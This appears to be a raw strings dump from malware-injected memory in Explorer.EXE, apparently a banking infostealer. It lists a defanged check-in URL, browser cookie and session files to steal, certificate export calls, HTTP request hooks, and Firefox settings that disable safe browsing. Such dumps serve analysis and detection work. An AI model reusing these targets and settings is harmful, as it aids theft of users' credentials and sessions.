FindCloseUrlCache
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
DisconnectNamedPipe
DisconnectNamedPipe
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
WaitNamedPipeA
WaitNamedPipeA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
EnumWindows
EnumWindows
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
CryptDestroyKey
CryptDestroyKey
CryptGetKeyParam
CryptGetKeyParam
CryptGetUserKey
CryptGetUserKey
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
3-33383|3
3-33383|3
6"6(6-676
6"6(6-676
RapportUtil.
RapportUtil.
(GMT %su:u) %s
(GMT %su:u) %s
\prefs.js
\prefs.js
RapportTanzan36.
RapportTanzan36.
RapportKoan.
RapportKoan.
Explorer.EXE_532_rwx_00FF0000_00002000:
!EYEc:\%original file name%.exe
!EYEc:\%original file name%.exe
C:\trivax1.Bin\
C:\trivax1.Bin\
trivax1.Bin.exe
trivax1.Bin.exe
config.bin
config.bin
OC93rK.exe
OC93rK.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
5.1.2600!XP7!A8A67A25
trivax1.Bin
trivax1.Bin
Microsoft Windows
Microsoft Windows
Explorer.EXE_532_rwx_01E00000_00005000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
PSSSSSSh
PSSSSSSh
Advapi32.dll
Advapi32.dll
guid=%s&ver=%u&ie=%s&os=%u.%u.%u&ut=%s&ccrc=X&md5=%s&plg=%s
guid=%s&ver=%u&ie=%s&os=%u.%u.%u&ut=%s&ccrc=X&md5=%s&plg=%s
%s?%s&stat=online
%s?%s&stat=online
hXXp://VVV.microsoft.com
hXXp://VVV.microsoft.com
%s?%s&%s
%s?%s&%s
ntdll.dll
ntdll.dll
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
ADVAPI32.dll
ADVAPI32.dll
customconnector.dll
customconnector.dll
TakeBotExeMd5Callback
TakeBotExeMd5Callback
5.1.2600!XP7!A8A67A25
5.1.2600!XP7!A8A67A25
hXXp://traxbax.com/user/gate.php
hXXp://traxbax.com/user/gate.php
Explorer.EXE_532_rwx_0BAD0000_00045000:
.text
.text
.reloc
.reloc
config.dat
config.dat
explorer.exe
explorer.exe
threadmetadata!nfo%d
threadmetadata!nfo%d
XX
XX
SOFTWARE\Microsoft Windows
SOFTWARE\Microsoft Windows
u.u.u u:u:u.u
u.u.u u:u:u.u
0xx
0xx
(%d bytes)
(%d bytes)
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_URL
INTERNET_OPTION_URL
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_PASSWORD
INTERNET_OPTION_PASSWORD
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_UNKNOWN
HTTP_QUERY_UNKNOWN
HTTP_QUERY_CUSTOM
HTTP_QUERY_CUSTOM
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_EXPECT
HTTP_QUERY_EXPECT
HTTP_QUERY_WARNING
HTTP_QUERY_WARNING
HTTP_QUERY_VIA
HTTP_QUERY_VIA
HTTP_QUERY_VARY
HTTP_QUERY_VARY
HTTP_QUERY_UPGRADE
HTTP_QUERY_UPGRADE
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_RANGE
HTTP_QUERY_RANGE
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_HOST
HTTP_QUERY_HOST
HTTP_QUERY_ETAG
HTTP_QUERY_ETAG
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_AGE
HTTP_QUERY_AGE
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_REFRESH
HTTP_QUERY_REFRESH
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_COOKIE
HTTP_QUERY_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_USER_AGENT
HTTP_QUERY_USER_AGENT
HTTP_QUERY_TITLE
HTTP_QUERY_TITLE
HTTP_QUERY_SERVER
HTTP_QUERY_SERVER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_REFERER
HTTP_QUERY_REFERER
HTTP_QUERY_ORIG_URI
HTTP_QUERY_ORIG_URI
HTTP_QUERY_LOCATION
HTTP_QUERY_LOCATION
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_FROM
HTTP_QUERY_FROM
HTTP_QUERY_FORWARDED
HTTP_QUERY_FORWARDED
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT
HTTP_QUERY_ACCEPT
HTTP_QUERY_CONNECTION
HTTP_QUERY_CONNECTION
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_VERSION
HTTP_QUERY_VERSION
HTTP_QUERY_PRAGMA
HTTP_QUERY_PRAGMA
HTTP_QUERY_LINK
HTTP_QUERY_LINK
HTTP_QUERY_COST
HTTP_QUERY_COST
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_URI
HTTP_QUERY_URI
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_EXPIRES
HTTP_QUERY_EXPIRES
HTTP_QUERY_DATE
HTTP_QUERY_DATE
HTTP_QUERY_PUBLIC
HTTP_QUERY_PUBLIC
HTTP_QUERY_ALLOW
HTTP_QUERY_ALLOW
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_MIME_VERSION
HTTP_QUERY_MIME_VERSION
Content-Length: %u
Content-Length: %u
HTTP/
HTTP/
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
\\.\pipe\globpluginsuninstallpipe
\\.\pipe\globpluginsuninstallpipe
cookies-nontor.xml
cookies-nontor.xml
cookies.txt
cookies.txt
sessionstore.js
sessionstore.js
sessionstore.bak
sessionstore.bak
cookies.sqlite-journal
cookies.sqlite-journal
cookies.sqlite
cookies.sqlite
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
\\.\pipe\processingpipe_
\\.\pipe\processingpipe_
services.exe
services.exe
csrss.exe
csrss.exe
smss.exe
smss.exe
\\.\pipe\globpluginspipe
\\.\pipe\globpluginspipe
X X
X X
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
user_pref("privacy.clearOnShutdown.sessions", false);
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/
/Mozilla/Firefox/
nspr4.dll
nspr4.dll
seieapiXX
seieapiXX
%s\Content.IE5\0
%s\Content.IE5\0
%s\Content.IE5\%s
%s\Content.IE5\%s
\Content.IE5\*.*
\Content.IE5\*.*
set_url
set_url
PFXImportCertStore
PFXImportCertStore
user32.dll
user32.dll
%d.%d.%d
%d.%d.%d
keys
keys
http:
http:
urlmask
urlmask
cert
cert
%s%s%s
%s%s%s
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
%d-%d-%d
%d-%d-%d
collectors.txt
collectors.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
ProxyHttp1.1
ProxyHttp1.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
EnableHttp1_1
EnableHttp1_1
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
.mpeg
.mpeg
.jpeg
.jpeg
%s&tid=%s&%s
%s&tid=%s&%s
TakeBotExeMd5Callback
TakeBotExeMd5Callback
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpAddRequestHeadersA
TakeOriginal_HttpAddRequestHeadersA
Callback_OnBeforeProcessUrl
Callback_OnBeforeProcessUrl
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
wlcomm.exe
wlcomm.exe
msmsgs.exe
msmsgs.exe
msnmsgr.exe
msnmsgr.exe
PR_OpenTCPSocket
PR_OpenTCPSocket
kernel32.dll
kernel32.dll
Crypt32.dll
Crypt32.dll
Advapi32.dll
Advapi32.dll
ws2_32.dll
ws2_32.dll
wininet.dll
wininet.dll
Ht.Ht!HHt
Ht.Ht!HHt
w SSh
w SSh
SSSSh
SSSSh
t.VPW
t.VPW
C:\trivax1.Bin\config.bin
C:\trivax1.Bin\config.bin
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\
C:\trivax1.Bin\
trivax1.Bin.exe
trivax1.Bin.exe
config.bin
config.bin
o0Iu6US.exe
o0Iu6US.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
5.1.2600!XP7!A8A67A25
trivax1.Bin
trivax1.Bin
Microsoft Windows
Microsoft Windows
PFXExportCertStoreEx
PFXExportCertStoreEx
CertCloseStore
CertCloseStore
CertAddCertificateContextToStore
CertAddCertificateContextToStore
CertOpenStore
CertOpenStore
CertGetCertificateContextProperty
CertGetCertificateContextProperty
CertDeleteCertificateFromStore
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertDuplicateCertificateContext
CertNameToStrA
CertNameToStrA
CertEnumCertificatesInStore
CertEnumCertificatesInStore
CertOpenSystemStoreA
CertOpenSystemStoreA
CRYPT32.dll
CRYPT32.dll
ntdll.dll
ntdll.dll
WS2_32.dll
WS2_32.dll
FindCloseUrlCache
FindCloseUrlCache
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
DeleteUrlCacheEntry
DeleteUrlCacheEntry
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
GetUrlCacheEntryInfoW
GetUrlCacheEntryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
GetProcessHeap
GetProcessHeap
DisconnectNamedPipe
DisconnectNamedPipe
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
WaitNamedPipeA
WaitNamedPipeA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
EnumWindows
EnumWindows
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
CryptDestroyKey
CryptDestroyKey
CryptGetKeyParam
CryptGetKeyParam
CryptGetUserKey
CryptGetUserKey
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
3-33383|3
3-33383|3
6"6(6-676
6"6(6-676
RapportUtil.
RapportUtil.
(GMT %su:u) %s
(GMT %su:u) %s
\prefs.js
\prefs.js
RapportTanzan36.
RapportTanzan36.
RapportKoan.
RapportKoan.
Explorer.EXE_532_rwx_0BB50000_0004F000:
.text
.text
.reloc
.reloc
config.dat
config.dat
explorer.exe
explorer.exe
screenshots.txt
screenshots.txt
threadmetadata!nfo%d
threadmetadata!nfo%d
XX
XX
SOFTWARE\Microsoft Windows
SOFTWARE\Microsoft Windows
u.u.u u:u:u.u
u.u.u u:u:u.u
0xx
0xx
(%d bytes)
(%d bytes)
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_URL
INTERNET_OPTION_URL
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_PASSWORD
INTERNET_OPTION_PASSWORD
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_UNKNOWN
HTTP_QUERY_UNKNOWN
HTTP_QUERY_CUSTOM
HTTP_QUERY_CUSTOM
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_EXPECT
HTTP_QUERY_EXPECT
HTTP_QUERY_WARNING
HTTP_QUERY_WARNING
HTTP_QUERY_VIA
HTTP_QUERY_VIA
HTTP_QUERY_VARY
HTTP_QUERY_VARY
HTTP_QUERY_UPGRADE
HTTP_QUERY_UPGRADE
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_RANGE
HTTP_QUERY_RANGE
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_HOST
HTTP_QUERY_HOST
HTTP_QUERY_ETAG
HTTP_QUERY_ETAG
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_AGE
HTTP_QUERY_AGE
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_REFRESH
HTTP_QUERY_REFRESH
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_COOKIE
HTTP_QUERY_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_USER_AGENT
HTTP_QUERY_USER_AGENT
HTTP_QUERY_TITLE
HTTP_QUERY_TITLE
HTTP_QUERY_SERVER
HTTP_QUERY_SERVER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_REFERER
HTTP_QUERY_REFERER
HTTP_QUERY_ORIG_URI
HTTP_QUERY_ORIG_URI
HTTP_QUERY_LOCATION
HTTP_QUERY_LOCATION
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_FROM
HTTP_QUERY_FROM
HTTP_QUERY_FORWARDED
HTTP_QUERY_FORWARDED
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT
HTTP_QUERY_ACCEPT
HTTP_QUERY_CONNECTION
HTTP_QUERY_CONNECTION
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_VERSION
HTTP_QUERY_VERSION
HTTP_QUERY_PRAGMA
HTTP_QUERY_PRAGMA
HTTP_QUERY_LINK
HTTP_QUERY_LINK
HTTP_QUERY_COST
HTTP_QUERY_COST
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_URI
HTTP_QUERY_URI
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_EXPIRES
HTTP_QUERY_EXPIRES
HTTP_QUERY_DATE
HTTP_QUERY_DATE
HTTP_QUERY_PUBLIC
HTTP_QUERY_PUBLIC
HTTP_QUERY_ALLOW
HTTP_QUERY_ALLOW
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_MIME_VERSION
HTTP_QUERY_MIME_VERSION
Content-Length: %u
Content-Length: %u
HTTP/
HTTP/
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
\\.\pipe\globpluginsuninstallpipe
\\.\pipe\globpluginsuninstallpipe
cookies-nontor.xml
cookies-nontor.xml
cookies.txt
cookies.txt
sessionstore.js
sessionstore.js
sessionstore.bak
sessionstore.bak
cookies.sqlite-journal
cookies.sqlite-journal
cookies.sqlite
cookies.sqlite
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
